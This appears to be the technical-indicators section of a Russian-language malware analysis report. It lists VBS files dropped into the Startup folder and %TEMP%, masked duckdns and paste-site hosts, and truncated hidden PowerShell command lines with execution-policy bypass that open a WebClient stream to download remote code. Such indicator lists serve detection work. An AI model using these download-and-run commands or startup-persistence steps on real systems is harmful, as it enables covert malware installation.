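Техническая информация
Ниже перечислены: файлы, создаваемые в папке автозагрузки пользователя (Startup) и в каталоге %TEMP%; сетевые узлы с портами и DNS-запросы; командные строки запускаемых процессов. Символы «#» в доменных именах — маскировка в самом отчёте, а командные строки PowerShell обрезаны («...»), поэтому эти значения неполны, и использовать их как точные индикаторы без сверки с полным отчётом нельзя.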
- %APPDATA%\microsoft\windows\start menu\programs\startup\driversound.vbs
- %APPDATA%\microsoft\windows\start menu\programs\startup\smartphone.vbs
- %TEMP%\r.vbs
- %TEMP%\l.vbs
- '1.###4top.net':443
- 'pa###bin.com':443
- 'ga#####ro.duckdns.org':2017
- 'ga#####ro.duckdns.org':2018
- DNS ASK 1.###4top.net
- DNS ASK ga#####ro.duckdns.org
- DNS ASK pa###bin.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\r.vbs"
- '<SYSTEM32>\wscript.exe' "%TEMP%\l.vbs"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://1.top4to...